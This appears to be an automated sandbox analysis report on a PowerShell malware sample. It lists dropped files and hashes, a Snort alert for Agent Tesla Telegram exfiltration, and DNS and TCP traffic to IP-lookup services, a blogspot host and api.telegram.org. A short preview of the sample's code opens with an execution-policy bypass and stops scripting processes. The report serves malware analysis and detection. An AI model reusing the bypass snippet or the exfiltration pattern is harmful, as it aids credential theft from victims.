C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbvflsbx.dsn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5rnlyjj.gop.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twhwfcos.p4u.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxwfgjf5.s0j.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7132399020651268
Encrypted:	false
SSDEEP:	48:NWfEsWZOCkbU2K+PTukvhkvklCywIn2/s080lzdSogZo/fs080lWdSogZoT1:AsdZOCZo6kvhkvCCtrs080mHcs080xH4
MD5:	6D0B2E1D6615A31B5222173DC613B09D
SHA1:	2D925ECBBEDCF9EFC4AFFE76564D670010A420D2
SHA-256:	B361775F6F932D13F578A522CE077BD21611DC685C5D7E68D6C0CC73228DE80E
SHA-512:	14CCB5BB26FDEECF04D30B48F7FCAE4A6FB485BD809CD06C25E9DC4ECEE8625CA3CA06E18A8CEBC55C2585A0871E01D6227D4507C23153564309CE0E8EFE8242
Malicious:	false
Preview:	...................................FL..................F.".. ...d.......f.#2...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......c.2......#2.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......DWSl.X......C.....................t.z.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.X......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.X......E.....................cDw.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.X......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.X......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X......q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QNXL5CJO929GDZJGR1C2.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7132399020651268
Encrypted:	false
SSDEEP:	48:NWfEsWZOCkbU2K+PTukvhkvklCywIn2/s080lzdSogZo/fs080lWdSogZoT1:AsdZOCZo6kvhkvCCtrs080mHcs080xH4
MD5:	6D0B2E1D6615A31B5222173DC613B09D
SHA1:	2D925ECBBEDCF9EFC4AFFE76564D670010A420D2
SHA-256:	B361775F6F932D13F578A522CE077BD21611DC685C5D7E68D6C0CC73228DE80E
SHA-512:	14CCB5BB26FDEECF04D30B48F7FCAE4A6FB485BD809CD06C25E9DC4ECEE8625CA3CA06E18A8CEBC55C2585A0871E01D6227D4507C23153564309CE0E8EFE8242
Malicious:	false
Preview:	...................................FL..................F.".. ...d.......f.#2...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......c.2......#2.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......DWSl.X......C.....................t.z.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.X......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.X......E.....................cDw.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.X......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.X......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X......q...........

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.422180078773067
Encrypted:	false
SSDEEP:	6144:HSvfpi6ceLP/9skLmb0OTgWSPHaJG8nAgeMZMMhA2fX4WABlEnNf0uhiTw:yvloTgW+EZMM6DFy503w
MD5:	63EC9107DF64DEC8EFC642313843D588
SHA1:	E36F64923AD0DCCA1F6FEA070F53FD6855B36458
SHA-256:	9A1A3FDD0A9F08890E21823B00A6B7E0207923970EE71B23775CDFFDC4FBBD2E
SHA-512:	EB08452C45375BF646AD006BF767241135F07DA2BE43702FF0F06730439E1F1C5868BF10209116B8693C91C2B7DB5B3FFFA2FB98DCF95251CA9886B29A3C8EF3
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.(.12...............................................................................................................................................................................................................................................................................................................................................Fu..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (64834)
Entropy (8bit):	2.3998758135311147
TrID:
File name:	o3KyzpE7F4.ps1
File size:	4'056'486 bytes
MD5:	286e6941de5c1fdf6b1dfc6726c0c6f0
SHA1:	676a6423aada40788cb9cd90ae05326d5954c390
SHA256:	9545ddef182171d1fd3a8e74fb6ba72614b7ca243aa70c7425157f5d0ec9963e
SHA512:	994cf7e2e4689a76d1ed19bfcd95eef64f69911c5c4e7cb4a643f01f447eb8c4b10978de4cab11b07260a11aca9c693f5556ccff7d7a1e4600b23269642b4157
SSDEEP:	3072:rR69Sqe86QEjrBRYh+bPyML500Q5/hSP2HwYhExjDMI8xYluuibk5M5Tx4juSGTU:bf
TLSH:	B21655A3BB442DB5708EC9654032B7E5C2A86CA3C4E3835EC759B0814D7EFDD6E2D486
File Content Preview:	Set-ExecutionPolicy -Scope CurrentUser Bypass -Force.$ProcessesToStop = @("RegSvcs", "mshta", "wscript", "msbuild")..$ProcessesToStop \| ForEach-Object {. if ($Process = Get-Process -Name $_ -ErrorAction SilentlyContinue) {. Stop-Process -Name $_

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/25/24-19:01:27.040324	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49720	443	192.168.2.5	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 19:00:54.727544069 CEST	49675	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:00:54.727556944 CEST	49674	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:00:54.852463007 CEST	49673	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:04.337066889 CEST	49674	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:04.339037895 CEST	49675	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:04.461853981 CEST	49673	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:05.815083981 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 25, 2024 19:01:05.815179110 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:16.625482082 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:16.625571966 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:16.626128912 CEST	49710	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:16.626228094 CEST	443	49710	23.1.237.91	192.168.2.5
Apr 25, 2024 19:01:16.626343966 CEST	49710	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:16.626599073 CEST	49710	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:16.626638889 CEST	443	49710	23.1.237.91	192.168.2.5
Apr 25, 2024 19:01:16.783231974 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 25, 2024 19:01:16.783245087 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 25, 2024 19:01:16.954803944 CEST	443	49710	23.1.237.91	192.168.2.5
Apr 25, 2024 19:01:16.955001116 CEST	49710	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:20.993438959 CEST	49712	443	192.168.2.5	172.67.74.152
Apr 25, 2024 19:01:20.993484974 CEST	443	49712	172.67.74.152	192.168.2.5
Apr 25, 2024 19:01:20.993583918 CEST	49712	443	192.168.2.5	172.67.74.152
Apr 25, 2024 19:01:21.002861977 CEST	49712	443	192.168.2.5	172.67.74.152
Apr 25, 2024 19:01:21.002881050 CEST	443	49712	172.67.74.152	192.168.2.5
Apr 25, 2024 19:01:21.250305891 CEST	443	49712	172.67.74.152	192.168.2.5
Apr 25, 2024 19:01:21.250452042 CEST	49712	443	192.168.2.5	172.67.74.152
Apr 25, 2024 19:01:21.254878044 CEST	49712	443	192.168.2.5	172.67.74.152
Apr 25, 2024 19:01:21.254893064 CEST	443	49712	172.67.74.152	192.168.2.5
Apr 25, 2024 19:01:21.255301952 CEST	443	49712	172.67.74.152	192.168.2.5
Apr 25, 2024 19:01:21.318994045 CEST	49712	443	192.168.2.5	172.67.74.152
Apr 25, 2024 19:01:21.364125013 CEST	443	49712	172.67.74.152	192.168.2.5
Apr 25, 2024 19:01:23.616528034 CEST	49716	80	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:23.726746082 CEST	80	49716	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:23.726870060 CEST	49716	80	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:23.732165098 CEST	49716	80	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:23.842294931 CEST	80	49716	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:23.887087107 CEST	80	49716	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:23.887149096 CEST	80	49716	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:23.887402058 CEST	49716	80	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:23.892836094 CEST	49717	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:23.892875910 CEST	443	49717	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:23.893256903 CEST	49717	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:23.897985935 CEST	49717	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:23.898005009 CEST	443	49717	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.129905939 CEST	443	49717	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.129998922 CEST	49717	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.130976915 CEST	443	49717	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.131036997 CEST	49717	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.132883072 CEST	49717	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.132911921 CEST	443	49717	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.133397102 CEST	443	49717	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.140993118 CEST	49717	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.188122034 CEST	443	49717	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.362149954 CEST	443	49717	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.362360954 CEST	443	49717	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.362617970 CEST	49717	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.364875078 CEST	49717	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.366214991 CEST	49718	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.366281033 CEST	443	49718	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.366893053 CEST	49718	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.367362022 CEST	49718	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.367396116 CEST	443	49718	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.590882063 CEST	443	49718	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.592612982 CEST	49718	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.592650890 CEST	443	49718	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.893367052 CEST	443	49718	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.893393993 CEST	443	49718	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.893465042 CEST	49718	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.893490076 CEST	443	49718	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.893896103 CEST	443	49718	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:24.893954039 CEST	49718	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.894529104 CEST	49718	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:24.976689100 CEST	443	49712	172.67.74.152	192.168.2.5
Apr 25, 2024 19:01:24.976754904 CEST	443	49712	172.67.74.152	192.168.2.5
Apr 25, 2024 19:01:24.976965904 CEST	49712	443	192.168.2.5	172.67.74.152
Apr 25, 2024 19:01:24.985682011 CEST	49712	443	192.168.2.5	172.67.74.152
Apr 25, 2024 19:01:25.107265949 CEST	49719	80	192.168.2.5	208.95.112.1
Apr 25, 2024 19:01:25.232320070 CEST	80	49719	208.95.112.1	192.168.2.5
Apr 25, 2024 19:01:25.232435942 CEST	49719	80	192.168.2.5	208.95.112.1
Apr 25, 2024 19:01:25.232599974 CEST	49719	80	192.168.2.5	208.95.112.1
Apr 25, 2024 19:01:25.357310057 CEST	80	49719	208.95.112.1	192.168.2.5
Apr 25, 2024 19:01:25.399539948 CEST	49719	80	192.168.2.5	208.95.112.1
Apr 25, 2024 19:01:26.134005070 CEST	49719	80	192.168.2.5	208.95.112.1
Apr 25, 2024 19:01:26.247134924 CEST	49720	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:26.247174978 CEST	443	49720	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:26.247255087 CEST	49720	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:26.250783920 CEST	49720	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:26.250799894 CEST	443	49720	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:26.256972075 CEST	80	49719	208.95.112.1	192.168.2.5
Apr 25, 2024 19:01:26.257054090 CEST	49719	80	192.168.2.5	208.95.112.1
Apr 25, 2024 19:01:26.690634966 CEST	443	49720	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:26.690721989 CEST	49720	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:26.692843914 CEST	49720	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:26.692853928 CEST	443	49720	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:26.693252087 CEST	443	49720	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:26.694693089 CEST	49720	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:26.740123987 CEST	443	49720	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:27.040183067 CEST	49720	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:27.040225029 CEST	443	49720	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:27.094886065 CEST	443	49720	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:27.149518967 CEST	49720	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:27.440239906 CEST	443	49720	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:27.440336943 CEST	443	49720	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:27.440464973 CEST	49720	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:27.445014000 CEST	49720	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:27.513892889 CEST	49721	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:27.513932943 CEST	443	49721	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:27.513995886 CEST	49721	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:27.514261007 CEST	49721	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:27.514276028 CEST	443	49721	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:27.943183899 CEST	443	49721	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:27.944906950 CEST	49721	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:27.944931030 CEST	443	49721	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:28.290112972 CEST	49721	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:28.290132999 CEST	443	49721	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:28.359311104 CEST	443	49721	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:28.399380922 CEST	49721	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:28.690601110 CEST	443	49721	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:28.690682888 CEST	443	49721	149.154.167.220	192.168.2.5
Apr 25, 2024 19:01:28.690746069 CEST	49721	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:28.691323996 CEST	49721	443	192.168.2.5	149.154.167.220
Apr 25, 2024 19:01:30.385020018 CEST	49716	80	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:36.105323076 CEST	443	49710	23.1.237.91	192.168.2.5
Apr 25, 2024 19:01:36.105443954 CEST	49710	443	192.168.2.5	23.1.237.91
Apr 25, 2024 19:01:41.043345928 CEST	49738	80	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.154707909 CEST	80	49738	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.155946016 CEST	49738	80	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.157087088 CEST	49738	80	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.267148972 CEST	80	49738	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.287103891 CEST	80	49738	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.287133932 CEST	80	49738	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.287193060 CEST	49738	80	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.291205883 CEST	49739	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.291248083 CEST	443	49739	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.291311026 CEST	49739	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.295547962 CEST	49739	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.295563936 CEST	443	49739	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.524589062 CEST	443	49739	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.524657011 CEST	49739	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.525755882 CEST	443	49739	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.525804043 CEST	49739	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.529577017 CEST	49739	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.529584885 CEST	443	49739	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.529917002 CEST	443	49739	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.537853956 CEST	49739	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.584117889 CEST	443	49739	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.767846107 CEST	443	49739	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.768177986 CEST	443	49739	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.768230915 CEST	49739	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.768632889 CEST	49739	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.769063950 CEST	49740	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.769112110 CEST	443	49740	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.769181013 CEST	49740	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.769539118 CEST	49740	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:41.769553900 CEST	443	49740	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:41.997226000 CEST	443	49740	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:42.004463911 CEST	49740	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:42.004507065 CEST	443	49740	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:42.398238897 CEST	443	49740	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:42.398412943 CEST	443	49740	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:42.398510933 CEST	49740	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:42.398545980 CEST	443	49740	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:42.398593903 CEST	443	49740	142.251.15.132	192.168.2.5
Apr 25, 2024 19:01:42.398652077 CEST	49740	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:42.399827003 CEST	49740	443	192.168.2.5	142.251.15.132
Apr 25, 2024 19:01:47.433654070 CEST	49738	80	192.168.2.5	142.251.15.132

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 19:01:20.870891094 CEST	51544	53	192.168.2.5	1.1.1.1
Apr 25, 2024 19:01:20.981278896 CEST	53	51544	1.1.1.1	192.168.2.5
Apr 25, 2024 19:01:23.482557058 CEST	63053	53	192.168.2.5	1.1.1.1
Apr 25, 2024 19:01:23.601933956 CEST	53	63053	1.1.1.1	192.168.2.5
Apr 25, 2024 19:01:24.996268988 CEST	61001	53	192.168.2.5	1.1.1.1
Apr 25, 2024 19:01:25.106534958 CEST	53	61001	1.1.1.1	192.168.2.5
Apr 25, 2024 19:01:26.134485006 CEST	62807	53	192.168.2.5	1.1.1.1
Apr 25, 2024 19:01:26.246345043 CEST	53	62807	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 25, 2024 19:01:20.870891094 CEST	192.168.2.5	1.1.1.1	0x544f	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:01:23.482557058 CEST	192.168.2.5	1.1.1.1	0xef5e	Standard query (0)	minecap4-22-24.blogspot.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:01:24.996268988 CEST	192.168.2.5	1.1.1.1	0xeda	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:01:26.134485006 CEST	192.168.2.5	1.1.1.1	0xe57d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 25, 2024 19:01:16.197289944 CEST	1.1.1.1	192.168.2.5	0x3b0a	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 25, 2024 19:01:16.197289944 CEST	1.1.1.1	192.168.2.5	0x3b0a	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:01:20.981278896 CEST	1.1.1.1	192.168.2.5	0x544f	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:01:20.981278896 CEST	1.1.1.1	192.168.2.5	0x544f	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:01:20.981278896 CEST	1.1.1.1	192.168.2.5	0x544f	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:01:23.601933956 CEST	1.1.1.1	192.168.2.5	0xef5e	No error (0)	minecap4-22-24.blogspot.com	blogspot.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 25, 2024 19:01:23.601933956 CEST	1.1.1.1	192.168.2.5	0xef5e	No error (0)	blogspot.l.googleusercontent.com		142.251.15.132	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:01:25.106534958 CEST	1.1.1.1	192.168.2.5	0xeda	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Apr 25, 2024 19:01:26.246345043 CEST	1.1.1.1	192.168.2.5	0xe57d	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

minecap4-22-24.blogspot.com

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49716	142.251.15.132	80	7196	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
